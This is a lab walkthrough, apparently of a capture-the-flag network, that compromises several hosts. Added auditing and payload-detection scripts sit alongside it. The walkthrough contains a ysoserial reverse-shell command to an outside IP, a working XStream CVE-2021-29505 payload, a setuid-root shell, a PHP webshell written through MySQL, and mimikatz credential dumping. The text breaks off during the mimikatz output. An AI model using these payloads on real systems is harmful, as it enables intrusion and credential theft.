FLAG01

Start with a round of information gathering using fscan:

```console
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.157.149

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-27 03:44:50] [INFO] brute-force threads: 1
[2025-04-27 03:44:50] [INFO] starting information scan
[2025-04-27 03:44:50] [INFO] final valid host count: 1
[2025-04-27 03:44:51] [INFO] starting host scan
[2025-04-27 03:44:51] [INFO] valid port count: 233
[2025-04-27 03:44:51] [SUCCESS] port open 39.99.157.149:22
[2025-04-27 03:44:51] [SUCCESS] port open 39.99.157.149:80
[2025-04-27 03:44:51] [SUCCESS] port open 39.99.157.149:21
[2025-04-27 03:44:51] [SUCCESS] service identified 39.99.157.149:22 => [ssh] version: 8.2p1 Ubuntu 4ubuntu0.5 product: OpenSSH os: Linux info: Ubuntu Linux; protocol 2.0 Banner: [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-27 03:44:51] [SUCCESS] service identified 39.99.157.149:21 => [ftp] version: 3.0.3 product: vsftpd os: Unix Banner: [220 (vsFTPd 3.0.3).]
[2025-04-27 03:44:53] [SUCCESS] port open 39.99.157.149:8080
[2025-04-27 03:44:56] [SUCCESS] service identified 39.99.157.149:80 => [http]
[2025-04-27 03:44:59] [SUCCESS] service identified 39.99.157.149:8080 => [http]
[2025-04-27 03:45:00] [INFO] live port count: 4
[2025-04-27 03:45:00] [INFO] starting vulnerability scan
[2025-04-27 03:45:00] [INFO] loaded plugins: ftp, ssh, webpoc, webtitle
[2025-04-27 03:45:01] [SUCCESS] web title http://39.99.157.149 status: 200 length: 10918 title: Apache2 Ubuntu Default Page: It works
[2025-04-27 03:45:02] [SUCCESS] anonymous login succeeded!
[2025-04-27 03:45:02] [SUCCESS] web title http://39.99.157.149:8080 status: 200 length: 3655 title: 公司发货单 (Company Delivery Note)
[2025-04-27 03:45:08] [SUCCESS] scan complete: 6/6
```
FTP allows anonymous login. After logging in, a pom.xml can be downloaded:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>
```
Two dangerous dependencies stand out: an old XStream (unsafe unmarshalling) and commons-collections 3.2.1 (the classic deserialization gadget library):

```xml
<dependency>
    <groupId>com.thoughtworks.xstream</groupId>
    <artifactId>xstream</artifactId>
    <version>1.4.16</version>
</dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>
```
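Spotting the two versions by eye works for a pom this small; for a real engagement you want the check automated. The script below is an added example, not part of the original writeup: it parses a pom.xml, resolves `${property}` versions, flags dependencies whose version is left to the parent BOM (you cannot judge those from this file alone), and compares the pinned ones against a small embedded table of known-bad ranges. The sample pom is a trimmed copy of the one above; the `cc.version` property is a constructed variation added to exercise property resolution (the original pins the version inline). The fixed-in versions used are 1.4.17 for CVE-2021-29505 and 3.2.2 for the commons-collections InvokerTransformer gadget (CVE-2015-7501).

```python
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# (groupId, artifactId) -> [(first fixed version, note)]; only the two libraries from this pom
KNOWN_BAD = {
    ("com.thoughtworks.xstream", "xstream"): [
        ("1.4.17", "CVE-2021-29505: RCE through unmarshalling, fixed in 1.4.17"),
    ],
    ("commons-collections", "commons-collections"): [
        ("3.2.2", "CVE-2015-7501: InvokerTransformer gadget; 3.2.2 disables unsafe "
                  "functor deserialization by default"),
    ],
}

# Constructed sample: trimmed copy of the pom.xml from the FTP share, with the
# commons-collections version moved into a property to exercise ${...} resolution.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.7.2</version>
  </parent>
  <groupId>com.example</groupId>
  <artifactId>ezjava</artifactId>
  <version>0.0.1-SNAPSHOT</version>
  <properties>
    <java.version>1.8</java.version>
    <cc.version>3.2.1</cc.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>${cc.version}</version>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(v):
    """Turn '1.4.16' or '1.4.18-SNAPSHOT' into a tuple of ints; qualifiers are dropped."""
    nums = []
    for part in v.split("-", 1)[0].split("."):
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    return tuple(nums)


def version_lt(a, b):
    """True if version a sorts strictly before b (missing components count as 0)."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) < tb + (0,) * (width - len(tb))


def audit_pom(pom_xml):
    """Return (groupId, artifactId, version, note) findings for one pom.xml string."""
    root = ET.fromstring(pom_xml)
    props = {}
    props_el = root.find("m:properties", NS)
    if props_el is not None:
        for p in props_el:
            props[p.tag.split("}", 1)[-1]] = (p.text or "").strip()

    findings = []
    for dep in root.findall("m:dependencies/m:dependency", NS):
        g = dep.findtext("m:groupId", default="", namespaces=NS).strip()
        a = dep.findtext("m:artifactId", default="", namespaces=NS).strip()
        v = dep.findtext("m:version", default="", namespaces=NS).strip()
        if v.startswith("${") and v.endswith("}"):
            v = props.get(v[2:-1], v)          # resolve ${property}
        if not v:
            # Version comes from the parent BOM (spring-boot-starter-parent here);
            # it must be resolved there before this dependency can be judged.
            findings.append((g, a, "<managed by parent>",
                             "version not pinned in this pom; resolve it from the parent BOM"))
            continue
        for fixed, note in KNOWN_BAD.get((g, a), []):
            if version_lt(v, fixed):
                findings.append((g, a, v, note))
    return findings


if __name__ == "__main__":
    for g, a, v, note in audit_pom(SAMPLE_POM):
        print(f"{g}:{a}:{v} -> {note}")
```

The "managed by parent" finding is the one people skip: a Spring Boot starter without a version is not safe just because no number is printed, its version is whatever the parent BOM says.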
xstream 1.4.16 is affected by CVE-2021-29505 (fixed in 1.4.17), and commons-collections 3.2.1 provides the CommonsCollections6 gadget for the second stage. Start a ysoserial JRMPListener that serves a CC6 payload; the base64 decodes to `bash -i >& /dev/tcp/106.75.70.202/4444 0>&1`, so a listener on port 4444 has to be running as well:

```console
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuNzUuNzAuMjAyLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"
```
Intercept a request to the application on port 8080 and replace the body with the CVE-2021-29505 payload. The chain ends in a `sun.rmi.registry.RegistryImpl_Stub` whose `UnicastRef` points at the JRMPListener, so the host and port below must match the listener:

```xml
<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
              <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                  <names>
                    <string>aa</string>
                    <string>aa</string>
                  </names>
                  <ctx>
                    <environment/>
                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                      <java.rmi.server.RemoteObject>
                        <string>UnicastRef</string>
                        <string>106.75.70.202</string>
                        <int>1099</int>
                        <long>0</long>
                        <int>0</int>
                        <long>0</long>
                        <short>0</short>
                        <boolean>false</boolean>
                      </java.rmi.server.RemoteObject>
                    </registry>
                    <host>106.75.70.202</host>
                    <port>1099</port>
                  </ctx>
                </candidates>
              </aliases>
            </nullIter>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
```
Once the request is sent the shell comes back (as root, judging by the prompt in the next section). Write an SSH public key into the root account for a stable foothold; flag01 is under /root/flag.
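Seen from the defender's side, the payload above has a very recognisable shape. The following is an added example, not code from the original writeup: it walks an XStream request body with the standard library XML parser, flags the gadget classes of the CVE-2021-29505 chain (XStream writes inner classes with `$` escaped to `_-` in element names, so both spellings are listed), and pulls the JRMP callback host and port out of the `RemoteObject` block so the indicator can go straight into a block list. The sample payload is a trimmed copy of the one above with the same 106.75.70.202:1099 endpoint; the benign body is constructed.

```python
import xml.etree.ElementTree as ET

# Class names used by the CVE-2021-29505 chain, as they appear in the XML
# (element names use XStream's '$' -> '_-' escaping, class attributes do not).
GADGET_MARKERS = {
    "javax.naming.ldap.Rdn_-RdnEntry",
    "javax.naming.ldap.Rdn$RdnEntry",
    "com.sun.org.apache.xpath.internal.objects.XString",
    "com.sun.xml.internal.ws.api.message.Packet",
    "com.sun.jndi.rmi.registry.BindingEnumeration",
    "sun.rmi.registry.RegistryImpl_Stub",
}

# Trimmed copy of the payload from the writeup (same structure, same callback).
SAMPLE_PAYLOAD = """<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default><size>2</size></default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
              <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                  <names><string>aa</string><string>aa</string></names>
                  <ctx>
                    <environment/>
                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                      <java.rmi.server.RemoteObject>
                        <string>UnicastRef</string>
                        <string>106.75.70.202</string>
                        <int>1099</int>
                        <long>0</long><int>0</int><long>0</long><short>0</short><boolean>false</boolean>
                      </java.rmi.server.RemoteObject>
                    </registry>
                    <host>106.75.70.202</host>
                    <port>1099</port>
                  </ctx>
                </candidates>
              </aliases>
            </nullIter>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
"""

# Constructed: what a legitimate body for an XStream-backed endpoint might look like.
BENIGN_BODY = "<com.example.Order><id>1</id><item>widget</item></com.example.Order>"


def inspect_xstream_body(body):
    """Scan an XStream XML body for CVE-2021-29505 gadget classes and JRMP callbacks."""
    root = ET.fromstring(body)
    seen, callbacks, custom = set(), [], False
    for el in root.iter():
        seen.update({el.tag, el.get("class", "")} & GADGET_MARKERS)
        if el.get("serialization") == "custom":
            custom = True
        # RegistryImpl_Stub's custom form carries a RemoteObject block laid out as
        # <string>UnicastRef</string><string>host</string><int>port</int>...
        if el.tag == "java.rmi.server.RemoteObject":
            kids = [(k.text or "").strip() for k in el]
            if len(kids) >= 3 and kids[0] == "UnicastRef":
                callbacks.append((kids[1], int(kids[2])))
    return {
        "gadget_classes": sorted(seen),
        "custom_serialization": custom,
        "jrmp_callbacks": callbacks,
        "verdict": "block" if seen else "allow",
    }


if __name__ == "__main__":
    print(inspect_xstream_body(SAMPLE_PAYLOAD))
    print(inspect_xstream_body(BENIGN_BODY))
```

The `serialization='custom'` attribute on its own is not proof of an attack (XStream emits it for any class with `writeObject`), which is why the verdict keys off the class names. The actual fix is to move to XStream 1.4.17 or later and configure an explicit allowlist of the application's own types with `allowTypesByWildcard`; the check here only buys detection while that upgrade happens.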
FLAG02

Upload fscan to the foothold and scan the internal network, and set up a proxy for later use (the proxychains output further down shows a SOCKS proxy on 192.168.11.1:9999):

```console
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:09:09:4b brd ff:ff:ff:ff:ff:ff
    inet 172.22.13.14/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315359007sec preferred_lft 315359007sec
    inet6 fe80::216:3eff:fe09:94b/64 scope link
       valid_lft forever preferred_lft forever
root@ubuntu:~# ./f
flag/   fscan2
root@ubuntu:~# ./fscan2 -h 172.22.13.14/24

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-27 15:59:52] [INFO] brute-force threads: 1
[2025-04-27 15:59:52] [INFO] starting information scan
[2025-04-27 15:59:52] [INFO] CIDR range: 172.22.13.0-172.22.13.255
[2025-04-27 15:59:52] [INFO] generated IP range: 172.22.13.0.%!d(string=172.22.13.255)-%!s(MISSING).%!d(MISSING)
[2025-04-27 15:59:52] [INFO] parsed CIDR 172.22.13.14/24 -> IP range 172.22.13.0-172.22.13.255
[2025-04-27 15:59:52] [INFO] final valid host count: 256
[2025-04-27 15:59:52] [INFO] starting host scan
[2025-04-27 15:59:52] [SUCCESS] target 172.22.13.14 alive (ICMP)
[2025-04-27 15:59:52] [SUCCESS] target 172.22.13.6 alive (ICMP)
[2025-04-27 15:59:52] [SUCCESS] target 172.22.13.57 alive (ICMP)
[2025-04-27 15:59:52] [SUCCESS] target 172.22.13.28 alive (ICMP)
[2025-04-27 15:59:55] [INFO] live host count: 4
[2025-04-27 15:59:55] [INFO] valid port count: 233
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.57:22
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.14:22
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.14:21
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:80
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.57:80
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:135
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.14:80
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.6:135
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.6:445
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.6:88
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.6:389
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:139
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.6:139
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:445
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:3306
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.28:8000
[2025-04-27 15:59:55] [SUCCESS] port open 172.22.13.14:8080
[2025-04-27 15:59:55] [SUCCESS] service identified 172.22.13.57:22 => [ssh] version: 7.4 product: OpenSSH info: protocol 2.0 Banner: [SSH-2.0-OpenSSH_7.4.]
[2025-04-27 15:59:56] [SUCCESS] service identified 172.22.13.14:22 => [ssh] version: 8.2p1 Ubuntu 4ubuntu0.5 product: OpenSSH os: Linux info: Ubuntu Linux; protocol 2.0 Banner: [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-27 15:59:56] [SUCCESS] service identified 172.22.13.14:21 => [ftp] version: 3.0.3 product: vsftpd os: Unix Banner: [220 (vsFTPd 3.0.3).]
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.57:80 => [http] version: 1.20.1 product: nginx
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.6:445 =>
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.6:88 =>
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.28:80 => [http]
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.28:139 => Banner: [.]
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.6:389 =>
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.6:139 => Banner: [.]
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.28:445 =>
[2025-04-27 16:00:01] [SUCCESS] service identified 172.22.13.28:8000 =>
[2025-04-27 16:00:02] [SUCCESS] service identified 172.22.13.14:8080 => [http]
[2025-04-27 16:00:02] [SUCCESS] service identified 172.22.13.14:80 => [http]
[2025-04-27 16:00:09] [SUCCESS] service identified 172.22.13.28:3306 => Banner: [!.#08S01Got packets out of order]
[2025-04-27 16:01:01] [SUCCESS] service identified 172.22.13.28:135 =>
[2025-04-27 16:01:01] [SUCCESS] service identified 172.22.13.6:135 =>
[2025-04-27 16:01:01] [INFO] live port count: 17
[2025-04-27 16:01:01] [INFO] starting vulnerability scan
[2025-04-27 16:01:01] [INFO] loaded plugins: findnet, ftp, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-27 16:01:01] [SUCCESS] web title http://172.22.13.57 status: 200 length: 4833 title: Welcome to CentOS
[2025-04-27 16:01:01] [SUCCESS] NetInfo scan result
    target host: 172.22.13.6
    hostname: WIN-DC
    network interfaces found:
        IPv4 addresses:
            └─ 172.22.13.6
[2025-04-27 16:01:01] [SUCCESS] web title http://172.22.13.28 status: 200 length: 2525 title: 欢迎登录 OA 办公平台 (Welcome to the OA office platform)
[2025-04-27 16:01:01] [SUCCESS] anonymous login succeeded!
[2025-04-27 16:01:01] [SUCCESS] NetBios 172.22.13.6 DC: XIAORANG\WIN-DC
[2025-04-27 16:01:01] [SUCCESS] web title http://172.22.13.14 status: 200 length: 10918 title: Apache2 Ubuntu Default Page: It works
[2025-04-27 16:01:01] [SUCCESS] NetInfo scan result
    target host: 172.22.13.28
    hostname: WIN-HAUWOLAO
    network interfaces found:
        IPv4 addresses:
            └─ 172.22.13.28
[2025-04-27 16:01:01] [SUCCESS] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-27 16:01:01] [SUCCESS] web title http://172.22.13.14:8080 status: 200 length: 3655 title: 公司发货单 (Company Delivery Note)
[2025-04-27 16:01:01] [SUCCESS] web title http://172.22.13.28:8000 status: 200 length: 170 title: Nothing Here.
```
Three internal hosts besides the foothold: 172.22.13.6 is the domain controller WIN-DC of xiaorang.lab (88/389/445), 172.22.13.28 is WIN-HAUWOLAO, a Windows Server 2016 box with an OA system on port 80 and MySQL on 3306, and 172.22.13.57 is a CentOS host running nginx. The challenge hints at NFS, so scan for port 2049 first:

```console
root@ubuntu:~# ./fscan2 -h 172.22.13.14/24 -p 2049

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-27 16:07:15] [INFO] brute-force threads: 1
[2025-04-27 16:07:15] [INFO] starting information scan
[2025-04-27 16:07:15] [INFO] CIDR range: 172.22.13.0-172.22.13.255
[2025-04-27 16:07:15] [INFO] generated IP range: 172.22.13.0.%!d(string=172.22.13.255)-%!s(MISSING).%!d(MISSING)
[2025-04-27 16:07:16] [INFO] parsed CIDR 172.22.13.14/24 -> IP range 172.22.13.0-172.22.13.255
[2025-04-27 16:07:16] [INFO] final valid host count: 256
[2025-04-27 16:07:16] [INFO] starting host scan
[2025-04-27 16:07:16] [SUCCESS] target 172.22.13.6 alive (ICMP)
[2025-04-27 16:07:16] [SUCCESS] target 172.22.13.14 alive (ICMP)
[2025-04-27 16:07:16] [SUCCESS] target 172.22.13.28 alive (ICMP)
[2025-04-27 16:07:16] [SUCCESS] target 172.22.13.57 alive (ICMP)
[2025-04-27 16:07:19] [INFO] live host count: 4
[2025-04-27 16:07:19] [INFO] valid port count: 1
[2025-04-27 16:07:19] [SUCCESS] port open 172.22.13.57:2049
```
172.22.13.57 has port 2049 open. List the exports from the foothold and mount the share. Mounting the server's `/` works here because an NFSv4 server exposes its exports under a pseudo-root, so `/home/joyce` appears at `./test/home/joyce`; mounting `172.22.13.57:/home/joyce` directly would do the same.

```console
# run on the foothold (172.22.13.14), which can reach the NFS server
root@ubuntu:~# showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# mkdir test
root@ubuntu:/tmp# mount -t nfs 172.22.13.57:/ ./test -o nolock
```
joyce's home directory is now mounted. Write a public key into it:

```console
root@ubuntu:/tmp/test/home/joyce# mkdir .ssh
root@ubuntu:/tmp/test/home/joyce# cd .ssh
root@ubuntu:/tmp/test/home/joyce/.ssh# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJcatU49PfwyMAfrfJcaaIFCNOJNWOdDonEg3ahNxG8H root@kali' > authorized_keys
```
Then SSH in through the proxy (`proxy` here invokes proxychains-ng, as its output shows). Note in the listing that `.ssh` is owned by root on the server: the export does not squash root, which matters for the privilege escalation below.

```console
┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# proxy -f proxychains4.conf ssh joyce@172.22.13.57
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.11.1:9999  ...  172.22.13.57:22  ...  OK
The authenticity of host '172.22.13.57 (172.22.13.57)' can't be established.
ED25519 key fingerprint is SHA256:Y8qbRlvlJKReDyk1mEsy/A7aQosNyeucM/GZs7aI8SA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.22.13.57' (ED25519) to the list of known hosts.
Last login: Thu Aug 11 18:16:01 2022

Welcome to Alibaba Cloud Elastic Compute Service !

[joyce@centos ~]$ ls
[joyce@centos ~]$ ls -al
total 28
drwx------  3 joyce joyce 4096 Apr 27 16:11 .
drwxr-xr-x. 4 root  root  4096 Aug 10  2022 ..
-rw-------  1 joyce joyce    5 Aug 11  2022 .bash_history
-rw-r--r--  1 joyce joyce   18 Nov 25  2021 .bash_logout
-rw-r--r--  1 joyce joyce  193 Nov 25  2021 .bash_profile
-rw-r--r--  1 joyce joyce  231 Nov 25  2021 .bashrc
drwxr-xr-x  2 root  root  4096 Apr 27 16:12 .ssh
[joyce@centos ~]$
```
Try to escalate: look for SUID binaries.

```console
[joyce@centos ~]$ find / -perm -u=s 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
/usr/lib/polkit-1/polkit-agent-helper-1
```
The SUID ftp binary can be used to read files, but the NFS mount gives a shell directly: because the export does not squash root (the `.ssh` directory created from the foothold showed up owned by root), a root-owned SUID binary dropped onto the share keeps its owner and its setuid bit on the server. Build one on the foothold and move it into joyce's home. The original one-liner had no includes and compiled with implicit-declaration warnings; with the headers added it compiles cleanly. If the foothold's glibc is newer than the target's, add `-static` so the binary does not depend on the target's libc.

```c
/* root.c: setuid-root wrapper that drops into a root shell */
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
```

```console
root@ubuntu:/tmp# gcc root.c -o root
root@ubuntu:/tmp# chmod +s ./root
root@ubuntu:/tmp# mv root ./test/home/joyce/
```

Back in the SSH session as joyce:

```console
[joyce@centos ~]$ ls
root
[joyce@centos ~]$ ./root
[root@centos ~]# id
uid=0(root) gid=0(root) groups=0(root),994(joyce)
```
flag02 is in the root directory (/).
FLAG03

172.22.13.28 runs an OA system. A full-port fscan of that host (the mysql plugin is loaded by default) turns up a weak MySQL password. Connect with Navicat and check whether the server is allowed to write files and where its data directory lives:

```sql
mysql> show variables like "secure_file_priv";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.05 sec)

mysql> show variables like "%general%";
+------------------+--------------------------------------------------------------+
| Variable_name    | Value                                                        |
+------------------+--------------------------------------------------------------+
| general_log      | OFF                                                          |
| general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\WIN-HAUWOLAO.log |
+------------------+--------------------------------------------------------------+
2 rows in set (0.06 sec)
```
`secure_file_priv` is empty, so `INTO OUTFILE` may write anywhere the MySQL service account can, and the log path reveals a phpstudy install, whose web root is C:/phpstudy_pro/WWW. Write a webshell there:

```sql
mysql> select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
Query OK, 1 row affected (0.03 sec)
```
Connect with AntSword; flag03 is under C:/Users/Administrator/flag/.
FLAG04

Create a local user and add it to the administrators group:

```console
C:\Users\Administrator\flag> net user lv Asd123123 /add
The command completed successfully.

C:\Users\Administrator\flag> net localgroup administrators lv /add
The command completed successfully.
```
RDP in as that user, upload mimikatz and dump credentials from LSASS:

```console
  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 11159151 (00000000:00aa466f)
Session           : RemoteInteractive from 2
User Name         : lv
Domain            : WIN-HAUWOLAO
Logon Server      : WIN-HAUWOLAO
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-21-2057596273-973658165-3030246172-1000
        msv :
         [00000003] Primary
         * Username : lv
         * Domain   : WIN-HAUWOLAO
